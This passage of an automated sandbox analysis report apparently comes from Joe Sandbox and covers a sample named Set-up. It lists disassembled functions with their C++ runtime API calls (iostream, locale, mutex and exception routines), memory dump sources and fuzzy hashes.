                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_?snextc@?$basic_streambuf@_?sputc@?$basic_streambuf@_H_prolog3H_prolog3_catchV12@
                                                                                              • String ID:
                                                                                              • API String ID: 4023532899-0
                                                                                              • Opcode ID: e510fb0144d764cf58ce535035205e24683403e8a864a935b4896add333c152a
                                                                                              • Instruction ID: 435aae3fd6b4e9b5a31209d968bd37c182e1872bcf2c678c83e17416ea77abbc
                                                                                              • Opcode Fuzzy Hash: e510fb0144d764cf58ce535035205e24683403e8a864a935b4896add333c152a
                                                                                              • Instruction Fuzzy Hash: 1921D170D58684DFDB11CFA9C450FADBBF0BF95318F64818AD045A7291EB788B40DBA1
                                                                                              Function 6BC3A8CC Relevance: 7.6, APIs: 5, Instructions: 70COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _malloc_crt.MSVCR100(0000000C,00000001,00000001,?,00000000,?,6BC3AA3B,?,00000001,00000001,00000000,00000000,?,6BC2249E,00000000,?), ref: 6BC3A90A
                                                                                              • InterlockedCompareExchange.KERNEL32(00000000,00000000,00000001), ref: 6BC3A932
                                                                                              • _free_locale.MSVCR100 ref: 6BC3A94B
                                                                                              • free.MSVCR100 ref: 6BC3A952
                                                                                              • free.MSVCR100 ref: 6BC3A960
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$CompareExchangeInterlocked_free_locale_malloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 1641075975-0
                                                                                              • Opcode ID: 9f12f661c87bdf90a49550fb3ba5ecb501abc5d527b883d4b76a171998c38768
                                                                                              • Instruction ID: 8119c8867761dbd470cf172342a7e96cf8792e9340abf5353922ca787a82c0ad
                                                                                              • Opcode Fuzzy Hash: 9f12f661c87bdf90a49550fb3ba5ecb501abc5d527b883d4b76a171998c38768
                                                                                              • Instruction Fuzzy Hash: 8A11E436A06731EBCF14CF5AD485C4E3BB5EBC97607614058F525AB200E738DB10C7A0
                                                                                              Function 6BC2DF3D Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2DF44
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,0000000C), ref: 6BC2DF69
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?in_avail@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE_JXZ.MSVCP100(00000001,?,0000000C), ref: 6BC2DF8A
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,0000000C), ref: 6BC2DFD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?in_avail@?$basic_streambuf@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_H_prolog3H_prolog3_catchIpfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 723763902-0
                                                                                              • Opcode ID: 084f0c4bd3db85e92616c12d8a0d5a4f2f0940561d54321241018d8c11f5353f
                                                                                              • Instruction ID: 86082cb77ce03d735c5095ae9325d794ba50f4dc992e94c8454af86fd4b5e84a
                                                                                              • Opcode Fuzzy Hash: 084f0c4bd3db85e92616c12d8a0d5a4f2f0940561d54321241018d8c11f5353f
                                                                                              • Instruction Fuzzy Hash: 6521D270A64706CFCB10CFA4C8919AEB7B2FFA4314B10856DE555D7360E7789B41CB89
                                                                                              Function 6BC3AB51 Relevance: 7.6, APIs: 5, Instructions: 60COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CompareString___lc_collate_cp_func___lc_handle_func__crt_errnomemcmp
                                                                                              • String ID:
                                                                                              • API String ID: 3865160394-0
                                                                                              • Opcode ID: 0c1ce6671e0a44c9e9103a7377bf7bd3f78b371c9e112c3194543d2e5e9a42c5
                                                                                              • Instruction ID: 6587c58f3a8ba26f5d95d0f021c2b1830a56750ce96745052bae92bc3e857a5f
                                                                                              • Opcode Fuzzy Hash: 0c1ce6671e0a44c9e9103a7377bf7bd3f78b371c9e112c3194543d2e5e9a42c5
                                                                                              • Instruction Fuzzy Hash: E011C132614124AFCF204F5DDC45E9E7BB9FBC5768B014110F9249B110E639EA208BA0
                                                                                              Function 6BC23DDB Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC23DE2
                                                                                              • std::_Mutex::_Mutex.LIBCPMT(00000008), ref: 6BC23DF5
                                                                                                • Part of subcall function 6BC3BAE3: ??2@YAPAXI@Z.MSVCR100(00000018,?,6BC21266,00000004), ref: 6BC3BAEA
                                                                                                • Part of subcall function 6BC3BAE3: _Mtxinit.MSVCP100(00000000,00000018,?,6BC21266,00000004), ref: 6BC3BAF2
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000004,00000008), ref: 6BC23E00
                                                                                              • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QBE?AVlocale@2@XZ.MSVCP100(00000000,00000008), ref: 6BC23E17
                                                                                                • Part of subcall function 6BC22533: std::locale::facet::_Incref.LIBCPMT ref: 6BC22548
                                                                                              • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100(00000008), ref: 6BC23E25
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@U?$char_traits@_W@std@@@std@@$?getloc@?$basic_streambuf@_H_prolog3IncrefInit@?$basic_streambuf@_MtxinitMutexMutex::_Vlocale@2@std::_std::locale::facet::_
                                                                                              • String ID:
                                                                                              • API String ID: 2834010639-0
                                                                                              • Opcode ID: 4d4b03c30ddabc66be254904c6c62be27531cde525907de444f8702ae77a80a3
                                                                                              • Instruction ID: b8622b3809dd645d515b1052ac2ded4d113bd16346543da6913030c6a6eff127
                                                                                              • Opcode Fuzzy Hash: 4d4b03c30ddabc66be254904c6c62be27531cde525907de444f8702ae77a80a3
                                                                                              • Instruction Fuzzy Hash: 7E210B74611A06DFC764CF2CC680A1AB7F1BF8D704B104559D586CBB50EB34FA51CB90
                                                                                              Function 6BC240D7 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC240DE
                                                                                              • std::_Mutex::_Mutex.LIBCPMT(00000008), ref: 6BC240F1
                                                                                                • Part of subcall function 6BC3BAE3: ??2@YAPAXI@Z.MSVCR100(00000018,?,6BC21266,00000004), ref: 6BC3BAEA
                                                                                                • Part of subcall function 6BC3BAE3: _Mtxinit.MSVCP100(00000000,00000018,?,6BC21266,00000004), ref: 6BC3BAF2
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000004,00000008), ref: 6BC240FC
                                                                                              • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QBE?AVlocale@2@XZ.MSVCP100(00000000,00000008), ref: 6BC24113
                                                                                                • Part of subcall function 6BC22533: std::locale::facet::_Incref.LIBCPMT ref: 6BC22548
                                                                                              • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100(00000008), ref: 6BC24121
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@U?$char_traits@_W@std@@@std@@$?getloc@?$basic_streambuf@_H_prolog3IncrefInit@?$basic_streambuf@_MtxinitMutexMutex::_Vlocale@2@std::_std::locale::facet::_
                                                                                              • String ID:
                                                                                              • API String ID: 2834010639-0
                                                                                              • Opcode ID: e8e2f18b973a6e2e43cc2d10319a410954cfb352a6a9df051568c015811cb723
                                                                                              • Instruction ID: cc16f0e95ca0fe228544981f989d9585df5ca8a008eb350646f35e81406fae68
                                                                                              • Opcode Fuzzy Hash: e8e2f18b973a6e2e43cc2d10319a410954cfb352a6a9df051568c015811cb723
                                                                                              • Instruction Fuzzy Hash: A321F974621A02CFC754CF2CC581A1AB7F1BF8D304B104559D58ACBB50EB34FA11CB90
                                                                                              Function 6BC2D897 Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2D89E
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000018), ref: 6BC2D8C9
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000018), ref: 6BC2D8EE
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000018), ref: 6BC2D967
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?sgetc@?$basic_streambuf@_H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_Ipfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 2087867759-0
                                                                                              • Opcode ID: c1b702c8d6454d7895d0f90e02338bfc8f39f1365d7bb354e713ca36cb4608ee
                                                                                              • Instruction ID: 3c26f8e7dbabe188dc0018041c5f82388357a44adb0af733f1a7e9d02d3eb9d3
                                                                                              • Opcode Fuzzy Hash: c1b702c8d6454d7895d0f90e02338bfc8f39f1365d7bb354e713ca36cb4608ee
                                                                                              • Instruction Fuzzy Hash: 00215B7495520ACFC710DFA9C5919ADBBB0BF59304B60806DE0966B690EB389F00DF90
                                                                                              Function 6BC2F14C Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2F153
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000018), ref: 6BC2F17E
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000018), ref: 6BC2F1A3
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000018), ref: 6BC2F21C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?sgetc@?$basic_streambuf@_H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_G@std@@@std@@Ipfx@?$basic_istream@U?$char_traits@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 3895274573-0
                                                                                              • Opcode ID: f4a060fa8530cb474fbc52b2f567ac71f0e5ad0404dc1e6f3a8c8554538f2994
                                                                                              • Instruction ID: f00bff9a0133fdc654bd7789464cec701b99aa4fc8e0770c556ae837da96e939
                                                                                              • Opcode Fuzzy Hash: f4a060fa8530cb474fbc52b2f567ac71f0e5ad0404dc1e6f3a8c8554538f2994
                                                                                              • Instruction Fuzzy Hash: 87215B7491420ACFCB10DFA9C9919ADBBF1BF59304BA0806DD096A7691EB389F00DF50
                                                                                              Function 6BC23A77 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC23A7E
                                                                                              • std::_Mutex::_Mutex.LIBCPMT(00000008), ref: 6BC23A91
                                                                                                • Part of subcall function 6BC3BAE3: ??2@YAPAXI@Z.MSVCR100(00000018,?,6BC21266,00000004), ref: 6BC3BAEA
                                                                                                • Part of subcall function 6BC3BAE3: _Mtxinit.MSVCP100(00000000,00000018,?,6BC21266,00000004), ref: 6BC3BAF2
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000004,00000008), ref: 6BC23A9C
                                                                                              • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QBE?AVlocale@2@XZ.MSVCP100(00000000,00000008), ref: 6BC23AB3
                                                                                                • Part of subcall function 6BC22533: std::locale::facet::_Incref.LIBCPMT ref: 6BC22548
                                                                                              • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100(00000008), ref: 6BC23AC1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@U?$char_traits@_W@std@@@std@@$?getloc@?$basic_streambuf@_H_prolog3IncrefInit@?$basic_streambuf@_MtxinitMutexMutex::_Vlocale@2@std::_std::locale::facet::_
                                                                                              • String ID:
                                                                                              • API String ID: 2834010639-0
                                                                                              • Opcode ID: 8927e1771d11560fc077a30ee899ee6d23d91a34f32b0f1763be226f8453cf87
                                                                                              • Instruction ID: 95cc2efd5b1733fe5bdcba72ab4f331aeee8f970a7c10fd3f6e48be02dd8ecee
                                                                                              • Opcode Fuzzy Hash: 8927e1771d11560fc077a30ee899ee6d23d91a34f32b0f1763be226f8453cf87
                                                                                              • Instruction Fuzzy Hash: 2D21F4B8711A02CFC758CF28C580A1AB7F1BF8D304B104568D94ACBB50E734FA41CBA0
                                                                                              Function 6BC2C043 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2C04A
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000018), ref: 6BC2C075
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000001,?,00000018), ref: 6BC2C097
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000018), ref: 6BC2C108
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?sgetc@?$basic_streambuf@H_prolog3_catchU?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_Ipfx@?$basic_istream@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 1392796196-0
                                                                                              • Opcode ID: 45a63b078f94dc4ccb93196eb66b960033a4af43975becc6ab85142c2a2e4b2b
                                                                                              • Instruction ID: fafa068eafdf16287da2f53e9eede13ff2ebdd4bf543cca3c4b3f1a61d7d1388
                                                                                              • Opcode Fuzzy Hash: 45a63b078f94dc4ccb93196eb66b960033a4af43975becc6ab85142c2a2e4b2b
                                                                                              • Instruction Fuzzy Hash: 43216770914209CFCB14CFA9CA9199EBBF0BF49314F60815ED0A6A72A0EB399F01DF50
                                                                                              Function 6BC20D9A Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DAF
                                                                                              • _CxxThrowException.MSVCR100(?,6BC484B4), ref: 6BC20DC5
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DE5
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C9D0), ref: 6BC20DFB
                                                                                              • ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC4C9D0), ref: 6BC20E11
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow$V01@@
                                                                                              • String ID:
                                                                                              • API String ID: 2939144689-0
                                                                                              • Opcode ID: 07cad94cf016ba335b6e579854eca16c5b8595e58c28227b4e2a7a30062ec812
                                                                                              • Instruction ID: bb7dea9d9535299f6de223609782f9c2e1636e4ec4069b2828ef88d4c0761ab1
                                                                                              • Opcode Fuzzy Hash: 07cad94cf016ba335b6e579854eca16c5b8595e58c28227b4e2a7a30062ec812
                                                                                              • Instruction Fuzzy Hash: B701E17681021CBBCB11DF99D445CCE7FBCEB94291F508166FA1597600EA78D744CBE1
                                                                                              Function 6BC25A78 Relevance: 7.5, APIs: 5, Instructions: 48COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25A7F
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000014,00000028,6BC3CA9C,?,?,00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?), ref: 6BC25A96
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,00000028,6BC3CA9C,?,?,00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?), ref: 6BC25ABF
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(00000000,00000028,6BC3CA9C,?,?,00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?), ref: 6BC25ADA
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028,6BC3CA9C,?,?,00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?,?), ref: 6BC25AF2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$??0_??1_??2@H_prolog3Init@?$time_put@_Locinfo@2@@U?$char_traits@_V?$ostreambuf_iterator@_W@std@@@std@@@std@@
                                                                                              • String ID:
                                                                                              • API String ID: 2183399274-0
                                                                                              • Opcode ID: 9b1291891197724d3a38e2cc601ed08f869e121bdcffe39b39a75e4756e49495
                                                                                              • Instruction ID: e9799037f9ad21c9d1047a1749e42da2c50db2cc19532f7f95e3940f7a2c0122
                                                                                              • Opcode Fuzzy Hash: 9b1291891197724d3a38e2cc601ed08f869e121bdcffe39b39a75e4756e49495
                                                                                              • Instruction Fuzzy Hash: 05114970A21614CFDB15CF68C8C26BEBBB0BF80710F50415BD564AB298FBB99B40CB90
